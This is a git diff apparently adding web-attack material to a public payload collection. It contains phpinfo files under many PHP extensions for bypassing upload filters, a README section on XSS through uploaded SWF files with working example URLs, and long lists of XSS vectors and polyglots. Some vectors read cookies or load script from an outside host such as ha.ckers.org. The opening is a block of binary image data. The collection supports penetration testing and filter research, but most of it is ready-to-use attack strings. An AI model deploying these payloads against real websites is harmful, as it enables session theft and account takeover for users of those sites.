z$>@z|DDgmv@AAS3LN?lF3D$`xB@7qHnuP@J+w?I$cwwcZ4y76xBP>V zo>ZI`&jh{({R0k1Ho6rea8yK*WQmgo|2@@h2HrL84>qu4y;uR&4ZawMZ=TGcT0RX* zpO8+VI|Gt1s_fOwV;> z7*ROV&g^b2-yWI1SPBa_+Ax8ZPWR6t0<+fx56mdxpPLFAXVqv2vhN53y#*8Y46Jy~2X4N`QS4yimkSy^h> zC5x+y1UR5@Z>dz}$_P=pC(~Od_^P5uq~c^G3SrGE{83G(?P4^3qw;GruhP6fY_jbU zr*v%2eRa6rGLUyAQML4Re^%Reo$}ZR$4{oJS*kuuwkltV#F}8f{L~*Pf;H!8p1D3}U5uNS|v}wGbPjBFu5RJ351u!X(U{H(7hF?v;r(nmou#{Bc zg%Ha38-D8)SGp0xf9PmC>6cni1pTH8wi+^o-74ie3}UAmo%%7pf_Y$;UbGy}2bZG! zhtvm_%-)&NqoAvn!-eO9+9K9rtNR~BBCEq?Q3El($n|C1H@o7p?|L6LA8szjb3s23 z#muEDGH0$cX1QO6R-;EYwBu)&zgzLY9sPI|v_aRA{X+mpR|LDA_7aD;yq{}$-|2+T zZ{6dmn>%vWl&TS~p#Xiw1c_IM>=)2qoLa!1OWBjK-V-zZJ;$GD@3oGJ+}KC>p2+<9`Evb8;fO9UfZ`Psf4Qvqlga>(!CW6( zUCWgf)1rX9QJRlj$5D43l0A}GSE|H(f9D4+i6uZ=|QZ}|Xvo_KF-gCpVG zu?~;PN^56=sNBP#HGn`J8r#6qF1IHOIr3-UQ?Dzg3CEzt#bqH9lYiw+>P67n2EnHf zDT+1I*=C~x)W~Z)K`#6V5=GQo{EK&(6V29W=$lF^oQ#x8JH@8zqCBG=s^NF$>C**i ze*4{BlD(ZYzX`tbGiiWW5Ulxl3RsAGKb2g*_h&?&iTj-mlaI$}ZJG`9w8D#~*m7q} zUXazf%*Cqdd>3tx)PCJxEFY&J$8JO&v68-mqkQgT5Yh|2a1q;@8?MU1-==MOa{uEu z5f=pwo2;0bj5zuv3hWxu7gTxTD~|qDKr`x{>iY9L_W4<0BISWsY=Rk~R>42uCjVs@ zeHyhbHuvH*HFjIX_^|gP3b}f%J74~S&6l$?(gzL3CG{dG%41!Ae;NpS7sDHLFP)p) zRIXZ(iYO0o$kb~*UV1|?i zP6?*n@1@Q*r|BFN2%H`siPY*1cS~dY%0HGlnl%I5E05(E(KfPBO3Xj@2W>natY!FB zC~adB$7zXW2ndv7yvW~9)3^X9-wazvN1mEuoQLrNc9x|j&#D!5L%vSQYs(uG2S`2- zysX=DoZtDB!IJ&s4fbA9h8w=+Xw$re7dX}Pk(w*e9yKY?05O!$!C zJmvrO_CXXSHt!Q<`>?Y^#tkk(R%umwr{og_L=?_=7A~b_{tPzqSN8T4d5Y(B$7dLB7j=D`6YnF$*q;^~qw6Sl^~&J5dP*O5#pBd+mv=Rrpd^S2 z_fTTu$^Nm9T}H>H=S+l0qr%;8(T`&t*;k;Gdd+g%@rZzp|EclQqoBQ-i*CIr=J#V? zFiH{{=C!=nB+@LTHo|Q1`NN7Z)h2Rd4n%tHm-iM7;(gxOTCGTIep^sIpTJj*gp^W) zA(O6o7yp35~BNpYBTrceEN6eTX;0lQcjoH$!jm6cDr_xgAhf~Pc-?v3)P$>x~ zi6`wN4L)IlbVWfh&)ch$U|{|3Nc(-N?89D~P+Zs94+^$)vQ!!t-8uc5h!e_Ir%jRJ z;JicU>P7Y-5N$jD-dA9C9d>-V;rjjbUCTE1?R5#IQt@jHH+S=2_h9F?0SIUV1yhDl z$`9ys_lVKzm<>S-gRFcKYG{c`BEr2WRfO9V>Cs_Wks8QJtQZlJr~dzdSM(omhVH-h z4?Zu;P@Ws2JxY61w^cN)wnoX?fmV6FiD6`=t{~w8cSatUS)V; zC2MaRqeEA=*d2u)$okXf0amgh&QSd!+%FP%2JKBF9cB{eX-^(`q+H?SQ$lYrEk0Z0 z?rOs`agW?DB z0IO;vi}U^Yg2X{f{ndC_(ahD|t`tMZi-j8*nOMVi7Unv%fUvV-g|{?su_gH1a&Lb6 z9QI3DtyS;uzE#qHeCQY3zH})gdMdn|*!a9d^Xjp~^9R4v1*Wuggoh-^dH?(4^5K7C=>I{1FtPtbf&QCJ{s#qmaC|*_h>w2ILd$ADc)tFB zDA0ett`8{CUhvJurEh%eJC=*XhYVnveds^n?O~2+)>@Ov#XIKL{&+gpQm%-xxP+u( zsfeDDy#ipK0SJ-0I~4%Ap*x-DborL4H3Kg~#NJB0*lFsNYX3CdwjOFhA7r&)GVxUC zwxVXQTvtlrk3-2Oq8@*nNWW!qV>%AvX`o9mE33L>_YYV}Y+9IK=2`xIOpCeBIqx2VNmeW}}W z!d3F>*O%mgEI|JXS$c=RJ(%gO7t%1jt6XF4-}N6x&!J-QQy^z}V->vc~6WxyB!nB!yU)ug-hW=bM42PdYPBX@c(jw%l?3P9F-Pr3Mi9-4E4 ztIqwAgMkNCG;KxX-}F7Ro?x|4$PZrqS(Ws#*cxRp7^<&$50LoRS>&U$;mZ^lEEEL+ zpYC#V>^RsyA`TswXUw5e8s1V_&ZMF(2MuP7W+&q^{Zk0z%AG$x-4OeDpNA+62f&u4 zDUQ@A^I~1QHs}I|)z4Uq=zG80na5v!zdo8V?pN+GH#mrl$ldveBPxeO19!`vxWa*; zjal^O`L$JQt#Z$-g6i6MEqB`I7mS|*LP5FKycsFqjwkmj>CbbcnDsNfd!%R(36a}x z)iBY{5@+O4y*i;@3gE6k_e`n04452aDOHMvhzHk6T;eir6*~*3FK>b8xb9CRJnZ<+ z%>L<+m?Z1C%a;HJcBHBDAd8oYV-eXBFy{#_z5Czu>-F4%iP4Nm$1z1LX7VP8BUE0S zGi%tT3Rz7WDYjJz94r+C-=(wrozO#{FvnP>mQi7(GnaRlH#tWt_OihIfna9$1)bk_ z!)=_u!B(jI@$z>!A`XEL!gaTX&|Q}B=prGOaj{-H0)%Tos=v1ZHYcOXX5mW{=+WviQkU>$#PL?QecAgg1|<-C`6 z9|WR1BzVK&A4k(dECpyA0uXjK9Bp@hYgjsq;r`z`$b3&Q{@p&y{1dF6hEYaQ#A9*d zkbD*j3WCFS78~z6dg+QMCoSg1?*p&v`%>hkyoz*k(|ACnV19pa>$BhE_zHYC+$^{^ zyDJ3(2u%S21MkIsIDlXPJ`^{u$-)r$Sa!#R(f{xv-~DNMVV=b zotGjY2F~V=R;~_?H-RQhEX0ihV8CDwK6=U8dIEmyr|b9zLzW~5Y?a&_b9Zh(7p76; zPWQuG$hN&OzDiIWfBkD`)^ffx)(G z$9(t8^lBYAyd9@kED$DR_zXjF?fa!S6vGmxgh!qxXBkdxA!3O>7IU_ISO+_=2Kbjx z^d{s$N^g_HeSI{7NZTF3!r;t9l-byRyzQp@l3yLZo+uh~KFU!k0+mg)%(!QdM>#I> ziLwd&11gzzCB9(;fC}c|_$3prJDtvnxbWoLPPpA{!FD-=H#yrOe?z%=iRU#M1Svb_ zuP9JgJzrkra?7N>onOvm);MXy)a&Q;@r;uBe}WL-=9tsj4uCuq!z6(Ch&8C)C|Wc_%GUKwC8Q2E6t5 zm`{8f+knWh7n;B?Su8Ds;f~SWcAh(h-xIN@h{QzPaQs1V3hjdGSo{v7>y`2$n*0L7 zpNFZ(trG}}Xcb}$vh=|y+b+X2>D&R(L#E;retl7NRHQMu62>J-ykiV*8Yw*dPa^KN zZm@^S0>}*32NhHZGP{WtU&Si`Gb40dBR)Y#Ms24hl#!6a1%-V9_V?lW^w#pj6E<2K z6AUvsZPbMfIZF;k7UUB>%(@~u-@bFR_aA4~3xg|wIo8M*4Ht)NBwKP=vY!|QFh2di z>jQNH(A1%Kvuo8cbEbDYX{V;qm$ z=`-7Zf(4A&ISGcVrqL6s!)pk)V!iOX6^a|gM8{li>J9c}(qk@JTe%X-Hf%6O52xC^ z8G8on;2v5*xD&K`Jx0(aavIjT_si7z@J%=PsH8{BvcqO5w0*S8t#dhVDA<_Z@%oT_X|+2Tlx5y*)MW zIXukYPhB8+EJ<9lb4Z*?B7Hx8`up#tAh+bsd5l9FvDR6xR8wb**TIH{QETE$3R!0H z+jHgnbRq5E!Oa{5iX0drPl8aGPkdzYB5os{D-w4~<2Q`;M-FsEt=9BBg9nzfrX5AD z(grHl#^uNH&?oojDDF+-ptR^m3~@Iu^Ld6eP%R7mFpP-+8Ehpq?5^qu9{PCvFwu9B zasw_HJ%DFWbs`9e>6Jrqf%F24a2_jz)_XJn0e~QM4`0u(z>ynD;zfhV9ek*KOoYA!6u5V12%91Zjw7A)u^>wY25bOt z;mb!xFcqYTT%r)fBr3q^9oEWe0PtW1Sr!M;3W;tBy*hd5*!X@Yv;KPDl+a+^cgIPL zybIM}bYV)I=Gw<-#-KvvO#oB@TA*d>^?UpqH^5;#G4$$Wnmx@NoaZ$5QI7+3AUYBP zI~H|la@(bM9^|jSefRjnCjkQ#!aYP{I7~a~)hwnA1-dMS3A0yurt99PF-d?Tpstk%y* z?BmzL`pd69d$s1~?CZ1wa)*5K07~B^VPl zb@vVzC5lO07^-M2oI9;TIZJ+A-=g?LoP^pMGm2xrmeJTEi9>28U_P?gPV+uK{pab@ z<&g24nKq%wP)A6rueY}<__eCPQ{TP)?>E%?t5?Cw6dc~46KlRK5f<3A+lp1yI69{5 z{{S`&0000V8_8t@8{3}5S>+J1eL-d6KXLp0@cdHY$l)G!o=WGNzX*%4?=3pvtI$`? z4Ez^IGlp&vya)r3l1K>s~;sM1$TH(UhiY1Uzpu=chQR4oTpjCm_ zx2GNbCW6)@QEH4rjG`#fM9x`3P^uMGtCr{MXPx=KG^`9Tvv~s&L6FN_xAdRhiovE2Lz}Eu-3A52P>O_AV$+1;WR8a zq^kNs-O@wTM8;7;P%4V5)ow4wdBK;bpEIoNSZPGCQGi;_#Z!RJ1p0`vv{%OC&OXne zDq=uk5*S{D2}@S08wUVph^$GfeJB`|sI86xQo+qlTzvAS)^g-nGX4iZCdf;_p4sdB z-{!^AyLbWL^Xs8iROczvkr3_bhJXR1_Uz1baH3>U`5Xsd!hYx0E`WCh2gV`WXXS(_ z4lGpP1g?4oKwz$fA!;|bN#h;HdHq0hnPGdI9w%oxxcSF6R>%924;8N9g6YD9=Lt7t zq&1=rirSUsLUMMZXXx#$gOIu9R26K4(CIFxD$rg4n}!4bG+P0sf7lCjEW3nYF8L0dKVv3 z_A!<3wCS<_?0m>LIOYEU3o^XzS~VVBkGtx<2mz;yrpo2QWGy9J4lcK8EeWtool5L0 zN0_C7aj?k5)0AgJG{eFQNks)Bic(CWJU!WNe*05BA?*<_rK%UNHt@X><4X;oO%4Yl@56S0Dm63bDqBY zemy=g7b%n6?zX020gexf2#(G)s&M4n2Tpcgb19TRgF$6dP9`(HTipWa8$*K!VAwnZ z%T@z{R6yWPwNjMk7;k9}i7t=UI_kNe}&uzpx0b;5DI-bxV+ zq9kBSc8u%X{q| zy}2}Oczm4b5fBjVjP-iYf%G@vo!1Bz8D;3Y5ULM* zN|X(O7PAVgm6wpYwpW*1BaQYMzSyyDDJsAZfT%?g5iz$sG;&6cNvO=bI^-pFIOSCu zs;chw&-&+@*LME^2%!qyybA9)Klg1I1EKG)=hx%+?blnmNGhb?gaqI*%=r>a=C?)? z!j-t_)o?uR4Gu>M2Jlpk4C3wU^nw6}z=OMVdxef+rBbC_s?~e0{`&k6_4G7LoQ3fN zoi7XG(n1i*Wr|BSpu2UB{{U0&XTWQ|9kzGTINOdf#yI&BBq|s^&wX~+{>TmO`1JUI zNTMvuDQ9_ir{_R`X9qj^@1H+kfLW5U=@(HzUa@psR9se@kkWAj;6O!@5_S8S>z`dB zE51B9Z#yT7pT%)yi}xO*BGVo>A0rWP3i1x8NjJ>h9ki;d)ynl;w`$k?yZnGj_8ap# ziD}p7>rI8WaM2Kk%T5qu+Og)^gtwTmm z0o^#>T=UKPn@WpD^-Z(9_CF~yEaR`|@$2#^?;CmH^%TTS#6i@+BMpJUJVlq2bWkNO z5#NpX&-;Y=1c`ug&4CNkmz6X~#DX)R86y#Ett#25L}ekBvtkSUO5?`s!BOwg{{Wl( zh$4iY!a5$kPd}BMfloZK=HrhNT^m|iPk-kAe-J7KQ~+E60;2*`0I<~5$t?F2RX2FL z0U(~-FyI^3)Z`c7IOeIb33zi&lAeaLBo-`{n0#VlKA6RL1`X;S?s`3Ez{5Za-giU2 zJ6}2V6%jxl2}iyb*QbA!FKf~Z{{TIoGEg@g~@? z_px(yVooA6BB)y^m9^FY009h9U@d`c4YVVZ-{bM=u0B2j6M5U_-r~^1k^nYlv`vx! z0EV#3GK1qu&R*lskC1{%E7ov&abHFGg)0{9IrH1ZbF(3!T07;Q-W~zqXiM%gt1m*v z0lH8MZRCZwQ@oZ(Dj$oPy<~f+P%YFPGbSj{Lv*zs`4)ODYDi zLCU29zClOd`2IaEhUZ&KXemKM0U0n+Pw>blT7Yp=8 zYSPMz474zC&WVe`VqsZ0ClS*-+Xiy=C`TdBrb=1`&G|yNMr_?Yt-Km*-Cic|Hh02xLLbno_V|Xq1A?l?WOl zZ!!Bn;^RBBN3|Qr?ata^lJpDL{{Vk_6%CS+z_V9_pz_f(L?J^(#%>+dU*Y67L2nU~ zVn+V}+&?bP0|phlxZbxW{O|LWF)s>zsg|H<=#9ml>%vS2HcWres<5mafMq9k#s_nLP|NzgYI8f z*F-8pGOXbbYm&S-&4xV1GO+9a*9RB5l+2@21};oXBUZ zux_is72?f7(cX1Y0awwQBb8QAr^DVju7`ny0GK;aZ?u`1)jH2EL#E5=>#9|K>~A06 z(B?a?NqE3kc5?;LggE(4jb#uDKpy}Ino5RvynFk3`~q9J5IYOoauo@sB%%_<5Fl2$ z`eAL1!5U(3GZ4;my#jBf*xR^!_czit54O9e^T&NQaHI(Au@0czLsCoKb~ziKC`Ww} zJ#ylYj@hmoqEZCLl`b$u8E^m(=Wi*J))=v#Tn8vQ(8Q{S0A~X>W*bOVT@(OL!X4=? zxc>mA`i|GYw>_{coVd*B0x@tOlV|pwy=j0XLYyu+Ek#MX(bcVUdA(K2_jFi#94=Vp z0+x$Ys*~U2_-~Iu+kr%62INi}JaWkq)x<_QxOvbd4pb+IqdPBQX{tA61GNjW3bB!N z289%nHUf1D(9uY-kc!(k`2=_$P!bRv+)TFHAuu%#PRVrhW;m~<(;UUnKzIfZBffqZ z4}0UkzMK3983AH&N~|Hcn&D8d6aY0VW2RSG}S4P>Tq1%v=6l;Cy$0Mnv55zP}K zF)~p;E}kCe{++Wv874l;zp72CIzP_`<5Ee%WQjSD4F|vgk;aIFSsK8pqlP$oJNkSD z9DDKG^WPIn8?v)Jy*zYklAK?1xCK~7HEbjDZs0_xCqL<8KwzYF1^^HfhykH=#I=0i z0fQCLQJ~B(YsU09(88ony*b+XJ{IVVv~!-pxi{Gb&l($=B&i1imSKwl{()?+aU7sd z=zExSSP|Kz!In+1n8qd1ffJ}aVsD40f?+*q@!P&ffpt|p-o(cIJ09AZ3t;P \ No newline at end of file diff --git a/Upload insecure files/PHP Extension/phpinfo.jpg.php b/Upload insecure files/PHP Extension/phpinfo.jpg.php new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.jpg.php @@ -0,0 +1 @@ + diff --git a/Upload insecure files/PHP Extension/phpinfo.php b/Upload insecure files/PHP Extension/phpinfo.php new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.php @@ -0,0 +1 @@ + diff --git a/Upload insecure files/PHP Extension/phpinfo.php3 b/Upload insecure files/PHP Extension/phpinfo.php3 new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.php3 @@ -0,0 +1 @@ + diff --git a/Upload insecure files/PHP Extension/phpinfo.php4 b/Upload insecure files/PHP Extension/phpinfo.php4 new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.php4 @@ -0,0 +1 @@ + diff --git a/Upload insecure files/PHP Extension/phpinfo.php5 b/Upload insecure files/PHP Extension/phpinfo.php5 new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.php5 @@ -0,0 +1 @@ + diff --git a/Upload insecure files/PHP Extension/phpinfo.php7 b/Upload insecure files/PHP Extension/phpinfo.php7 new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.php7 @@ -0,0 +1 @@ + diff --git a/Upload insecure files/PHP Extension/phpinfo.phpt b/Upload insecure files/PHP Extension/phpinfo.phpt new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.phpt @@ -0,0 +1 @@ + diff --git a/Upload insecure files/PHP Extension/phpinfo.pht b/Upload insecure files/PHP Extension/phpinfo.pht new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.pht @@ -0,0 +1 @@ + diff --git a/Upload insecure files/PHP Extension/phpinfo.phtml b/Upload insecure files/PHP Extension/phpinfo.phtml new file mode 100644 index 0000000..147cebc --- /dev/null +++ b/Upload insecure files/PHP Extension/phpinfo.phtml @@ -0,0 +1 @@ + diff --git a/Upload insecure files/README.md b/Upload insecure files/README.md index 83dbb45..7a8b7d1 100644 --- a/Upload insecure files/README.md +++ b/Upload insecure files/README.md @@ -1,5 +1,5 @@ # Upload -Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. +Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. ## Exploits Image Tragik @@ -36,5 +36,20 @@ JPG Bypass a resize - Upload the picture and use a local file inclusion http://localhost/test.php?c=ls ``` +XSS via SWF +``` +As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs. + +This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either. + +Examples: + +Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); + +IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} + +IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); +``` + ## Thanks to -* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil \ No newline at end of file +* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil diff --git a/XSS injection/BRUTELOGIC-XSS-BYPASS-STRINGS.txt b/XSS injection/BRUTELOGIC-XSS-BYPASS-STRINGS.txt new file mode 100644 index 0000000..59dedcd --- /dev/null +++ b/XSS injection/BRUTELOGIC-XSS-BYPASS-STRINGS.txt @@ -0,0 +1,17 @@ +alert`1` +alert(1) +alert(1) +alert(1) +(alert)(1) +a=alert,a(1) +[1].find(alert) +top["al"+"ert"](1) +top[/al/.source+/ert/.source](1) +al\u0065rt(1) +top['al\145rt'](1) +top['al\x65rt'](1) +top[8680439..toString(30)](1) +navigator.vibrate(500) +eval(URL.slice(-8))>#alert(1) +eval(location.hash.slice(1)>#alert(1) +innerHTML=location.hash># diff --git a/XSS injection/BRUTELOGIC-XSS-STRINGS.txt b/XSS injection/BRUTELOGIC-XSS-STRINGS.txt new file mode 100644 index 0000000..5ea07a0 --- /dev/null +++ b/XSS injection/BRUTELOGIC-XSS-STRINGS.txt @@ -0,0 +1,113 @@ + +"> +lose focus! +click this! +copy this! +right click this! +copy this! +double click this! +drag this! +focus this! +input here! +press any key! +press any key! +press any key! +click this! +hover this! +hover this! +hover this! +click this! +paste here! + + + + + + + + + +<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); + + + + + + + + + + + + + + + # + # +MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);# +# +%23 + + + + + + + +# +#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); + + +#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); + + +? +"> +

//["'`-->]]>]
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]
&alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]
0? :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
X//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]






...



//["'`-->]]>]
01//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
X//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
¼script ¾alert(19)//¼/script ¾//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
1//["'`-->]]>]
;1//["'`-->]]>]
+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//["'`-->]]>]
//["'`-->]]>]
+
1//["'`-->]]>]
+
]]>]
//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
XXXXXX//["'`-->]]>]
1//["'`-->]]>]
1//["'`-->]]>]
XXX//["'`-->]]>]
//["'`-->]]>]
//["'`-->]]>]
+
+ + + +><image xlink:href="//["'`-->]]>]
+
//["'`-->]]>]
+
  • +
    //["'`-->]]>]
    +
    XXX//["'`-->]]>]
    +
    + + + + +Hello +//["'`-->]]>]
    +
    X//["'`-->]]>]
    XXX
    //["'`-->]]>]
    XXX
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    +
    +//["'`-->]]>]
    +
    //["'`-->]]>]
    //["'`-->]]>]
    alert(57)//0//["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    XXX
    //["'`-->]]>]
    +
    XXX
    //["'`-->]]>]
    + +
    + + + + +//["'`-->]]>]
    + +
    // O10.10↓, OM10.0↓, GC6↓, FF + + // IE6, O10.10↓, OM10.0↓ + // IE6, O11.01↓, OM10.1↓//["'`-->]]>]
    +
    ]>&x;//["'`-->]]>]
    //["'`-->]]>]
    +
    + +//["'`-->]]>]
    + +
    +]>//["'`-->]]>]
    + +
    + XXX +//["'`-->]]>]
    +
    //["'`-->]]>]
    x
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    &x;//["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    +
    //["'`-->]]>]
    +
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    +
    + +//["'`-->]]>]
    + +
    + + + + + + + + + +//["'`-->]]>]
    + +
    + + +//["'`-->]]>]
    + +
    +
    + + + + +
    PRESS ENTER
    //["'`-->]]>]
    + +
    [A] +"> +"> +"> +[B] +"> +[C] + +[D] +<% foo>//["'`-->]]>]
    +
    X
    //["'`-->]]>]
    X
    //["'`-->]]>]
    +
    +alert(94) +//["'`-->]]>]
    + +
    + + + +//["'`-->]]>]
    + +
    +//["'`-->]]>]
    + +
    +
    + + + +
    +//["'`-->]]>]
    + +
    X
    +//["'`-->]]>]
    + +
    XXX//["'`-->]]>]
    +
    //["'`-->]]>]
    XXX//["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    +
    + +//["'`-->]]>]
    +
    //["'`-->]]>]
    //["'`-->]]>]
    //["'`-->]]>]
    +
    +`><img src=xx:x onerror=alert(108)></a> + + +`><img src=xx:x onerror=alert(2)// +`><img src=xx:x onerror=alert(3)////["'`-->]]>]
    + +
    + + +//["'`-->]]>]
    + +
    + +//["'`-->]]>]
    +
    X
    //["'`-->]]>]
    X
    //["'`-->]]>]
    +
    XXX
    +//["'`-->]]>]
    +
    XXX//["'`-->]]>]
    +
    +//["'`-->]]>]
    + +
    x
    + + +//["'`-->]]>]
    + +
    + +//["'`-->]]>]
    + +
    +

    Drop me

    +
    + +//["'`-->]]>]
    + +
    + +//["'`-->]]>]
    + +
    + + +Spam//["'`-->]]>]
    + +
    + +//["'`-->]]>]
    +
    Some text +www.example.org + + +//["'`-->]]>]
    + +
    // Safari 5.0, Chrome 9, 10 + // Safari 5.0//["'`-->]]>]
    + +
    + +]> + + + + + + + +//["'`-->]]>]
    + +
    +//["'`-->]]>]
    + +
    + +alert(127) +//["'`-->]]>]
    +
    +
    + + +//["'`-->]]>]
    + +
    CLICKME + + + +CLICKME + + +CLICKMEhttp://http://google.com +//["'`-->]]>]
    + +
    drag and drop one of the following strings to the drop box: +
    +jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// +
    +feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// +
    +feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b> +
    +feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// +
    +
    + Drop Box +
    //["'`-->]]>]
    + +
    + + +
    + + + + + + + + + +//["'`-->]]>]
    +
    //["'`-->]]>]
    +
    +<% + +%></xmp><img src=xx:x onerror=alert(134)// + + %>/ +alert(2) + + +XXX + +-->{} +*{color:red}//["'`-->]]>]
    + +
    + + +//["'`-->]]>]
    + +
    + + + + +
    //["'`-->]]>]
    + +
    + + + +//["'`-->]]>]
    +
    //["'`-->]]>]
    + + +
    +
    +
    + + + +exp/* + + + + + +getURL("javascript:alert('XSS')") +a="get"; + + + +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- + + + + +PT SRC="http://ha.ckers.org/xss.js"> diff --git a/XSS injection/Wrapper JS and Data XSS.md b/XSS injection/Wrapper JS and Data XSS.md deleted file mode 100644 index 4e7e3c7..0000000 --- a/XSS injection/Wrapper JS and Data XSS.md +++ /dev/null @@ -1,13 +0,0 @@ -XSS with javascript: -``` -javascript:prompt(1) - -%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341 - -javascript:confirm(1) -``` - -XSS with data: -``` -data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ -``` \ No newline at end of file diff --git a/XSS injection/XSS_Polyglots.txt b/XSS injection/XSS_Polyglots.txt new file mode 100644 index 0000000..21d6f97 --- /dev/null +++ b/XSS injection/XSS_Polyglots.txt @@ -0,0 +1,14 @@ +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> +“ onclick=alert(1)//